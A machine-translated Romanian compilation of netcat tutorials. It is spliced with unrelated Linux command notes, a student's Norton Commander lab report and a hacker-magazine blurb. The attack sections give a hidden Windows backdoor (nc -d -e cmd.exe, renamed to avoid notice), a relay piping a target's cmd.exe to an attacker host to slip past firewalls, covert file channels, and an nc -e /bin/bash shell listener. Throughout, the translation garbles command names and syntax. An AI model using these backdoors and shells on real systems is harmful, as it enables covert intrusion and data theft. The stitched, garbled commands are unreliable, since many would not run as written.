Netcat - exemple de utilizare. Utilizarea Netcat pentru a crea și testa conexiuni TCP și UDP pe descrierea VPS Netcat

Scopul principal al utilitarului netcat (sau „nc”, după cum se numește fișierul executabil corespunzător) este de a oferi utilizatorului posibilitatea de a transfera orice date prin rețea folosind un transport Protocolul TCP sau UDP. În plus, netcat poate face mai multe caracteristici interesante, de exemplu, scanarea porturi UDP sau TCP.

În acest caz, utilizatorul poate, în special:

  • selectați liber portul de legare (atât local, cât și la distanță);
  • efectuați (nu efectuați) traducerea înainte și inversă a numelor DNS;
  • leagă netcat la oricare dintre adresele de nivel de rețea ale nodului local;
  • transferați mesajele de intrare pentru procesare către alt program;
  • criptați datele care sunt transmise (această caracteristică este implementată în versiunea netcat, așa-numita cryptcat).

Moduri de funcționare de bază

Modurile de operare de bază ale utilitarului netcat sunt modul client și modul server.

Cea mai simplă opțiune de lansare în modul client:

port gazdă nc

(dacă trebuie să utilizați protocolul TCP) sau

nc -u port gazdă

(dacă trebuie să utilizați protocolul UDP).

Dacă opțiunea -u nu este activată, imediat după pornirea în acest mod, netcat încearcă să stabilească o conexiune TCP la portul portului nodului gazdă.

Sarcina netcat este să transfere la soclul gazdă:port tot ceea ce vine la el prin canalul INPUT standard și să emită către IEȘIRE standard tot ceea ce vine de la acest socket.

Cea mai simplă opțiune de a porni în modul server:

nc -l -p port

După ce a pornit în acest mod, netcat așteaptă cereri pentru a stabili o conexiune la portul TCP. După stabilirea unei conexiuni, scoate tot ce ajunge la ea prin această conexiune pe canalul standard OUTPUT și trimite înapoi tot ce ajunge la ea prin canalul standard INPUT.

Utilizați în pregătirea și efectuarea atacurilor software

Un astfel de scop larg al utilitarului netcat deschide multe posibilități de utilizare. Când pregătiți și efectuați atacuri software, este posibil să utilizați netcat pentru a rezolva următoarele probleme, de exemplu:

  • identificarea serviciilor furnizate de nodurile de rețea (prin scanarea porturilor TCP și UDP);
  • identificare software servicii furnizate de noduri de rețea (prin colectarea de jetoane);
  • pătrunderea în nodurile rețelei sau întreruperea disponibilității serviciilor pe care le furnizează;
  • Creare canale ascunse managementul nodurilor de rețea;
  • crearea de canale ascunse de transmisie a datelor.

În ultimele două cazuri, capacitatea de a cripta schimbul dintre client și serverul netcat (implementat în cryptcat) este foarte utilă.

Utilizarea netcat pentru a pătrunde în gazdele rețelei sau pentru a perturba de la distanță disponibilitatea serviciilor pe care le oferă

Penetrarea unui nod de rețea este vorbită în două sensuri:

1) ca despre sechestrarea puterilor utilizatorului unui nod (de către un subiect care nu avea nicio autoritate cu privire la acest nod);

2) cum să depășești restricțiile privind schimbul de informații cu un nod impus de un ecran de firewall (rețea).

netcat poate fi util în ambele cazuri.

Preluarea puterilor posibil printr-un atac de la distanță asupra unui server care aparține țintei atacului (folosind, de exemplu, o vulnerabilitate a serverului, cum ar fi un buffer overflow). În acest caz, atacatorul trebuie să poată transfera anumite date către server. De regulă, acestea sunt date care nu pot fi transmise folosind obișnuit program client(dar posibil cu netcat, deoarece netcat vă permite să transferați orice date).

Pătrunderea unui firewall (rețea) Abilitatea netcat de a se lega de oricine ar putea ajuta port local(activat cu opțiunea -p). De exemplu, dacă netcat în modul client se leagă la portul TCP 20 (ftp-data), în multe cazuri firewall-urile vor permite conexiuni la gazda(e) din rețeaua pe care o protejează.

Pentru a perturba disponibilitatea serviciilor, poate fi folosită capacitatea netcat de a transmite orice date către orice server (de exemplu, solicitări incorecte care duc la înghețarea serverului).

Utilizarea netcat pentru a crea canale de control ascunse pentru nodurile de rețea

Să presupunem că ținta atacului este o gazdă care rulează MS Windows NT. După ce a făcut față țintei atacului

nc –L -p xxxx -d -e cmd.exe

(unde xxxx este un număr de port arbitrar), obținem un canal de control ascuns pentru acest obiect. Aici, opțiunea -e activează un mod în care Ieșirea standard a rezultatelor netcat este conectată la INPUT standard a cmd.exe, iar Ieșirea standard a rezultatelor și mesajele de eroare cmd.exe este conectată la flux standard ENTER în utilitarul netcat. Opțiunea -L are același efect ca -l, cu diferența că specifică că netcat trebuie repornit cu aceleași argumente după finalizarea fiecărei conexiuni. Opțiunea -d (detașare) este folosită pentru a ascunde lansarea (netcat nu creează ferestre și nu este afișată în lista de activități). Efect suplimentar Ascunderea poate fi realizată prin redenumirea executabilului netcat.

Puteți utiliza acest canal dacă, de exemplu, rulați netcat pe un alt nod, după cum urmează:

nc troy xxxx

unde troy este adresa sau numele țintei atacului.

Opțiunea -e, totuși, nu este întotdeauna suportată de implementările netcat. Dacă această opțiune nu este acceptată, un rezultat similar poate fi obținut prin rularea a două instanțe de netcat pe ținta atacului și pe gazda atacatorului. De exemplu, puteți utiliza următorul scenariu. Pe ținta atacului, rulați:

nc -L -p xxxx -d | cmd.exe | nc Ulise aaaa

unde Odysseus este adresa sau numele gazdei atacatorului.

Și pe nodul atacatorului:

nc -l -p aaaa

nc troy xxxx

Acest scenariu se numește redirecționarea portului . Acordați atenție ordinii corecte de pornire a programelor (în acest text este afișat incorect: serverul trebuie pornit înaintea clientului).

Acest script poate fi modificat. De exemplu, rulați netcat pe ținta atacului numai în modul client și pe gazda atacatorului numai în modul server sau invers (în timp ce respectați ordinea corectă de pornire: serverul ar trebui să pornească înaintea clientului).

Manipularea modurilor de lansare netcat, împreună cu alegerea corectă numerele de port, pot permite în multe cazuri depășirea peretelui firewall (rețelei), dacă acesta din urmă este folosit pentru a proteja ținta atacului (de exemplu, dacă se folosește scenariul discutat mai sus, în multe cazuri poate fi reușită selectarea xxxx = 80 (port server HTTP), aaaa = 25 (port server SMTP)).

Utilizarea netcat pentru a crea canale secrete de date

Luați în considerare, de exemplu, cum să utilizați netcat pentru a transfera un fișier de la socket troy:xxxx la socket mac:yyyy.

Pentru a face acest lucru, rulați ceva de genul acesta pe nodul mac:

nc -l -p yyyy > godear

și pe nodul troy:

nc -p xxxx mac aaaa< prayer

Din nou, manipularea corectă a modurilor de pornire netcat și a numerelor de port poate ajuta la depășirea limitărilor impuse de firewall-urile.

Această notă va înregistra comenzi utile pentru sistemele bazate pe Linux cu care am avut de-a face.

Ștergerea fișierelor vechi în Linux

# find /var/log -mtime +60 -type f -exec rm -rf () \;

ÎN în acest exemplu Toate fișierele din directorul /var/log a căror dată de modificare este mai veche de 60 de zile vor fi șterse recursiv.

Cum să „telnet” folosind utilitarul netcat (nc).

# nc -v -w 5 10.200.7.2 -z 1414-1420

V: diagnosticare suplimentară (verbosă)

W 5: timeout (în secunde)

10.200.7.2: gazdă

Z 1414-1420: interval de porturi

# nc -v -w 5 10.200.7.2 -z 1414-1420 nc: conectare la 10.200.7.2 portul 1414 (tcp) expirat: operațiunea acum în curs nc: conectarea la 10.200.7.2 portul 1415 (tcp) expirat: timp de funcționare expirat acum în desfășurare nc: conectați-vă la portul 1416 10.200.7.2 (tcp) expirat: operațiunea acum în curs Conexiunea la portul 10.200.7.2 1417 a reușit! nc: conectare la portul 1418 10.200.7.2 (tcp) expirat: operațiune în curs de desfășurare nc: conectare la portul 1419 10.200.7.2 (tcp) expirat: operațiune în curs de desfășurare nc: conectare la portul 1420 10.200.7.2 (tcp) timed out: operațiune acum în curs

# nc -v -w 5 10.200.7.2 -z 1414-1420

nc: conectează-te la portul 1414 (tcp) 10.200.7.2 expirat: operațiune acum în curs

nc: conectează-te la portul 1415 (tcp) 10.200.7.2 expirat: operațiune acum în curs

nc: conectează-te la portul 1416 (tcp) 10.200.7.2 expirat: operațiune acum în curs

Conexiunea la portul 10.200.7.2 1417 a reușit!

nc: conectează-te la portul 1418 (tcp) 10.200.7.2 expirat: operațiune acum în curs

nc: conectează-te la portul 1419 (tcp) 10.200.7.2 expirat: operațiune acum în curs

nc: conectează-te la portul 1420 (tcp) 10.200.7.2 expirat: operațiune acum în curs

Cum să determinați versiunea unui sistem Unix

Pentru început, înțelegem ce fel de clasă de sistem de operare este aceasta prin lansarea unei comenzi care este universală pentru toate sistemele Unix:

# uname -a

care ne va oferi ceva de genul acesta:

Linux hostname.com 2.6.18-194.17.4.el5PAE #1 SMP Luni Oct 25 16:35:27 EDT 2010 i686 i686 i386 GNU/Linux

FreeBSD hostname.com 5.5-STABLE FreeBSD 5.5-STABLE #0: miercuri 5 decembrie 20:00:38 MSK 2007 [email protected]:/usr/obj/usr/src/sys/GENERIC i386 sau AIX svcas07 3 4 000145364C00

din care ne va deveni clar cine este. Pentru a determina în mod specific versiunea linux:

# cat /proc/version

Versiunea Linux 2.6.18-194.17.4.el5PAE ( [email protected]) (gcc versiunea 4.1.2 20080704 (Red Hat 4.1.2-48)) #1 SMP Luni Oct 25 16:35:27 EDT 2010

adică familia Linux și versiunea de kernel sunt acum cunoscute.

Familia Red Hat are o comandă mai detaliată pentru a afla versiunea Linux:

# cat /etc/redhat-release

CentOS versiunea 5.6 (finală)

Din fericire, acesta este un răspuns cuprinzător, dar Red Hat are și un utilitar suplimentar inclus în setul complet, care va afișa mai multe informatii detaliate despre versiunea linux:

# lsb_release -a

Versiunea LSB: :core-3.1-ia32:core-3.1-noarch:graphics-3.1-ia32:graphics-3.1-noarch ID distribuitor: CentOS Descriere: CentOS versiunea 5.5 (finală) Lansare: 5.5 Nume de cod: final

O alta varianta:

# cat ls /etc/*(-,_)(lansare,versiune) 2>/dev/null | cap -n 1

Cum să vezi cine „deține” un director

# fuzor -uc dir_name

cuptor- un utilitar care identifică procesele care utilizează fișiere sau socket-uri specificate. -c Similar cu opțiunea -m și utilizat pentru compatibilitatea POSIX.

-m Numele este un fișier pe un sistem de fișiere montat sau un dispozitiv bloc special montat. Listează toate procesele care utilizează fișiere din acest sistem de fișiere. Dacă fișierul specificat este un director, apoi nume/ este adăugat automat la numele său. și orice sistem de fișiere, care poate fi montat în acest director.

-u Adaugă la fiecare Nume PID proprietarul procesului.

Calculăm cât spațiu pe disc ocupă un director

# du -sh /var

Ieșire în MB sau GB.

Vizualizați un fișier cu posibilitatea de a derula în sus și în jos

# mai puțin fișier.txt

Obține orice dată din sistem

# dată -d „șir”

unde linia poate conține valorile: „Acum 1 zi”, „Acum 1 săptămână”, „Acum 1 an”.

Vedeți ultimele n linii din fișier

# coadă -n

De exemplu, vizualizarea ultimelor 20 de linii: tail -20 access_log

Urmărirea fișierelor

# tail -f access_log

Comanda tail cu comutatorul f vă permite să monitorizați un fișier: linii noi (adăugate la sfârșitul fișierului printr-un alt proces) sunt imprimate automat pe ecran în timp real. Acest lucru este util în special pentru a ține evidența jurnalelor.

Listați toate procesele java

#ps –ef| grep java

Convenabil de utilizat pentru a afișa toate procesele serverului de aplicații.

Lucrul cu access.log-ul serverului HTTP

# head -10 access.2014.08.14.log | cut -d ” ” -f 1,8,10 | sortare | unic

Afișează primele 10 rânduri din jurnal access.2014.08.14.log, sortând și eliminând duplicatele, în formatul „client_ip/client_domain_name, URL, HTTP code”.

# acces pisica.2014.08.14.log | cut -d ” ” -f 1,8,10 | sortare | uniq > access_result.txt

Același lucru, dar cu ieșire în fișierul C:\access_result.txt.

Departamentul Proiectare Drumuri

Lucrare de laborator nr 1

la cursul "Informatica"

Completat de studentul grupului nr. 114359 Raikhman Sergey Yurievich

Verificat

Lucrare de laborator nr 1

Subiect: Program de service Comandantul Norton

Ţintă: Aflați să vă controlați computerul folosind Norton Commander

Norton Commander vă permite să efectuați următoarele funcții: 1) efectuați funcții MS-DOS, 2) afișați conținutul directoarelor pe discuri, 3) afișați un arbore de directoare pe un disc, 4) vizualizați fișiere, 5) editați fișiere text, 6 ) copiați, mutați, redenumiți, ștergeți fișiere, 7) modificați atributele fișierului.

Lansa Comandantul Norton

Pentru a lansa Norton Commander, trebuie să tastați linie de comandă„nc” și apăsați „Enter”. Ieșiți din Norton Commander - F10 sau ALT+X

Vedere a ecranului și a panourilor

După lansarea Norton Commander, pe ecran apar două ferestre dreptunghiulare (panouri).


Sub aceste panouri se află promptul MS-DOS și o linie de informații cu semnificațiile tastelor funcționale.

AJUTOR F1 – informaţii scurte despre atribuirea tastelor la operarea NC.

F2 MENU – meniu utilizator

F3 VIEW – vizualizare fișier text, document

F4 EDIT – editarea unui fișier text

F5 COPY – copierea fișierelor

F6 RENMOV – redirecționează, redenumește fișierul

F7 MKDIR – crearea unui director (subdirectoare)

F8 DELETE – ștergerea fișierelor sau subdirectoarelor

F9 PULL DN – in linia de sus Ecranul afișează meniuri care conțin moduri de operare NC.

F10 IEȘI – ieșire NC

Meniu la apăsarea tastei F9

Stânga și dreapta – setați modurile de afișare a informațiilor pe panourile din stânga și din dreapta

Fișiere – se efectuează diverse operațiuni cu fișierele

Comenzi – execută diverse comenzi NC, setează configurația NC și modurile de operare.

Unul dintre elementele de meniu este evidențiat pentru a selecta un alt element, utilizați săgețile<¬>, <­>, <®>, <¯>și apăsați tasta „Enter”.

Selectarea fișierelor

Pentru a copia, șterge sau muta fișiere, trebuie să le selectați apăsând tasta Ins. Pentru a anula selecția, apăsați din nou pe „Ins”. Informațiile despre numărul de fișiere selectate apar în partea de jos a panoului.

Crearea unui director

Pentru a crea un director, apăsați tasta „F7”, introduceți numele acestuia și apăsați „Enter”.

Pentru a intra în director, apăsați tasta „Enter” de pe numele acestuia. Când apăsați tastele „ALT+F10”, pe ecran este afișat un arbore de directoare. Folosind tastele cursor vă puteți deplasa rapid la subdirectorul dorit.

Chei de bază NC

TAB – comutați la alt panou

ALT+F1 – ieșire în panoul din stânga al cuprinsului altui disc.

ALT+F2 – ieșire în panoul din dreapta al cuprinsului altui disc

CTRL+F1 – eliminați panoul din stânga de pe ecran

CTRL+F2 – eliminați panoul din dreapta de pe ecran

CTRL+O – eliminați ambele panouri

CTRL+U – schimba panouri

Pentru a porni computerul, trebuie să tastați „LOGIN” în linia promptă și să introduceți parola (335_2).

Teme de laborator

Folosind comenzile, creați o structură de subdirectoare pe disc:


Bună dragă cititor X!

Cred că acest desen poate fi numit un mini-test „Ești un hacker?” Încearcă să spui asta
înseamnă acest pisoi amuzant. Ei bine, dacă încă apar dificultăți, să știi că în fața ta se află cel mai preferat lucru dintre toți oamenii avansați, într-un fel sau altul
asociat cu rețeaua și numele acesteia este Netcat.

Netcat este un utilitar care vă permite să citiți și să transferați date prin rețea
conexiuni. Cu alte cuvinte, Netcat vă permite să vă conectați la orice și să faceți orice. Netcat este absolut autosuficient dacă este utilizat corect, poate înlocui orice instrument software, inclusiv chiar și pe cele cunoscute de tine
Apache. Deci, în chiar versiune simplă Netcat vă permite să creați conexiuni TCP și UDP de la orice la orice port, puteți „asculta” conexiunile de intrare (și puteți comanda „pisoiului” să aștepte conexiunile doar de la adresele și chiar porturile specificate de dvs!), poate scana porturile , rezolvați solicitările DNS, trimiteți orice comenzi de la intrarea standard, efectuați acțiuni predefinite ca răspuns la o conexiune pe care „pisoiul” o ascultă, faceți un dump Hex a datelor trimise și primite și multe, multe altele...

Deși, cred că a fost necesar să spun încă de la început că Netcat poate face totul; iar posibilitățile de utilizare a acestuia sunt limitate doar de nivelul cunoștințelor și al imaginației tale. Inițial, Netcat a fost conceput ca un utilitar Unix, dar, după cum înțelegeți, nu puteau decât să existe entuziaști care nu ar porta „pisicuța” pe Windows. Puteți găsi cu ușurință ambele versiuni în motoarele de căutare folosind interogarea „Netcat”. Dar beneficiile, desigur, merg la Unix-oids, care, atunci când sunt compilate, pot corecta ușor „pisoiul” și, prin urmare, pot activa funcțiile „funcții suplimentare” care sunt dezactivate implicit.

Dacă ați folosit vreodată „atacuri bazate pe software” sau pur și simplu ați pus exploatații, atunci probabil ați observat că mai mult de jumătate dintre ele folosesc Netcat într-un fel sau altul. Acest lucru se datorează în primul rând faptului că Netcat nu modifică niciodată datele primite în niciun fel (precum și cele de ieșire), spre deosebire, de exemplu, de un client Telnet, care interpretează mai întâi datele primite și abia apoi vi le oferă. De aceea, Netcat a devenit un instrument puternic pentru căutarea și exploatarea vulnerabilităților, datorită căruia Bugtraq a fost completat cu sute de postări noi.

Dar, dacă căutarea vulnerabilităților nu este treaba dvs., puteți încerca să utilizați Netcat ca browser web sau, de exemplu, client de mail; mai ales că în Internet Explorer iar Outlook a găsit găuri „proaspete”, Unicode vechi bun, heh... Mai mult, rușii noștri s-au remarcat în acest domeniu (! Mândria națională joacă un rol!). Dacă citiți acest articol folosind Explorer, du-te și vezi cât de „măgar” ești.
găurit

După aceasta, veți trece la Netcat - nu este foarte convenabil, dar
sigur... Și, în sfârșit, exemple de utilizare „avansată” a Netcat
(Unix):

  1. Netcat place ;
  2. Netcat ca utilitar " "; acestea sunt descrise adesea în X, dar în realitate pur și simplu trimit solicitări către motoarele de căutare bine cunoscute de tine... „Pisicuța” tău poate face și această treabă utilă!;
  3. Netcat place! Faceți furnizorul să se odihnească!!!

Vă rugăm să rețineți că totul se face sub formă de scripturi shell, așa că puteți corecta orice dacă este necesar.
Pentru asta vreau să-mi iau rămas bun. Citiți manualele și mult succes în învățarea utilitarului emblematic Netcat!

P.S./Personal/: Site-ul http://georgy.h1.ru/ este închis de mine. Odată pentru totdeauna. Mulțumesc tuturor celor care mi-au fost invitați.

În acest articol mă voi uita la popularul utilitar de rețea netcat și la trucuri utile atunci când lucrez cu el.


Netcat este un utilitar Unix care vă permite să stabiliți conexiuni TCP și UDP, să primiți date de acolo și să le transmiteți. În ciuda utilității și simplității sale, mulți nu știu cum să-l folosească și îl ocolesc nemeritat.


Folosind acest utilitar, puteți efectua câțiva pași atunci când efectuați testarea de penetrare. Acest lucru poate fi util atunci când mașina atacată lipsește (sau atrage atenția) pachetele instalate, există restricții (de exemplu, dispozitive IoT/Embedded), etc.


Ce poți face cu netcat:

  • porturi de scanare;
  • porturi direct;
  • Colectați bannere de serviciu;
  • Ascultați portul (legați pentru conexiune inversă);
  • Descărcați și încărcați fișiere;
  • Ieșire conținut HTTP brut;
  • Creați un mini-chat.

În general, cu ajutorul netcat puteți înlocui unele dintre utilitățile Unix, astfel încât acest instrument poate fi considerat un fel de combină pentru efectuarea anumitor sarcini.

Exemple practice

În multe cazuri, dacă este necesar să se verifice o anumită gazdă, aceștia folosesc telnet sau propriile servicii de servicii pentru a identifica gazda sau bannerul. Cum ne poate ajuta netcat:

Se verifică portul TCP deschis 12345

$ nc -vn 192.168.1.100 12345
nc: conectarea la 192.168.1.100 12345 (tcp) a eșuat: conexiune refuzată

$ nc -v 192.168.1.100 22
Conexiunea la portul 192.168.1.100 22 a reușit!
SSH-2.0-OpenSSH

Scanarea porturilor TCP cu netcat:

$ nc -vnz 192.168.1.100 20-24

Cu o astfel de scanare nu va exista nicio conexiune la port, ci doar o ieșire a unei conexiuni reușite:


nc: connectx la 192.168.1.100 portul 20 (tcp) a eșuat: conexiune refuzată
nc: connectx la 192.168.1.100 portul 21 (tcp) a eșuat: conexiune refuzată
a găsit 0 asociații
găsit 1 conexiuni:
1: steaguri=82
outif en0
src 192.168.1.100 portul 50168
dst 192.168.1.100 portul 22
informațiile de rang nu sunt disponibile
Informații auxiliare TCP disponibile
Conexiunea la portul 22 192.168.1.100 a reușit!
nc: connectx la 192.168.1.100 portul 23 (tcp) a eșuat: conexiune refuzată
nc: connectx la 192.168.1.100 portul 24 (tcp) a eșuat: conexiune refuzată

Scanare porturi UDP.

Pentru a scana porturile UDP cu nmap, aveți nevoie de privilegii de root. Dacă nu sunt acolo, în acest caz ne poate ajuta și utilitarul netcat:


$ nc -vnzu 192.168.1.100 5550-5560
Conexiunea la portul 5555 192.168.1.100 a reușit!

Trimiterea unui pachet UDP

$ echo -n „foo” | nc -u -w1 192.168.1.100 161

Acest lucru poate fi util atunci când interacționați cu dispozitivele din rețea.

Primirea datelor pe un port UDP și ieșirea datelor primite

$ nc -u localhost 7777

După primul mesaj, ieșirea se va opri. Dacă trebuie să acceptați mai multe mesaje, trebuie să utilizați cât timp este adevărat:


$ în timp ce adevărat; do nc -u localhost 7777; făcut

Transfer de fișiere. Folosind netcat, puteți să primiți fișiere și să le transferați pe o gazdă la distanță:


nc 192.168.1.100 5555< 1.txt
nc -lvp 5555 > /tmp/1.txt

Netcact ca un simplu server web.

Netcat poate acționa ca un simplu server web pentru a afișa pagini HTML.


$ în timp ce adevărat; face nc -lp 8888< index.html; done

Folosind un browser la: http://netcat host:8888/index.html. Pentru a utiliza portul standard al serverului web numărul 80, va trebui să rulați nc cu privilegii root:


$ în timp ce adevărat; do sudo nc -lp 80< test.html; done

Chat între noduri

Pe primul nod (192.168.1.100):


$nc -lp 9000

Pe al doilea nod:


$nc 192.168.1.100 9000

După executarea comenzilor, toate caracterele introduse în fereastra terminalului pe orice nod vor apărea în fereastra terminalului celuilalt nod.

Înveliș invers

Folosind netcat puteți organiza un reverse shell convenabil:


nc -e /bin/bash -lp 4444

Acum vă puteți conecta de la gazda la distanță:


$nc 192.168.1.100 4444

Nu trebuie să renunți dacă nu ai anumite instrumente, adesea destul de greoaie, uneori problema poate fi rezolvată cu mijloace improvizate.